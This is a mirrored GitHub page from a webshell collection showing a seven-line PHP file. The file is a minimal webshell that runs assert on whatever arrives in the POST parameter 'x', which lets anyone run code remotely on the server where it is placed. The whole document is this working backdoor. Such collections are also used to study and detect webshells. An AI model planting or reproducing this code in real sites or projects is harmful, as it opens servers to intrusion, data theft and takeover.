mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
7 lines
87 B
PHP
7 lines
87 B
PHP
<?php
|
|
function sqlsec($a){
|
|
$a($_POST['x']);
|
|
}
|
|
|
|
sqlsec(assert);
|
|
?>
|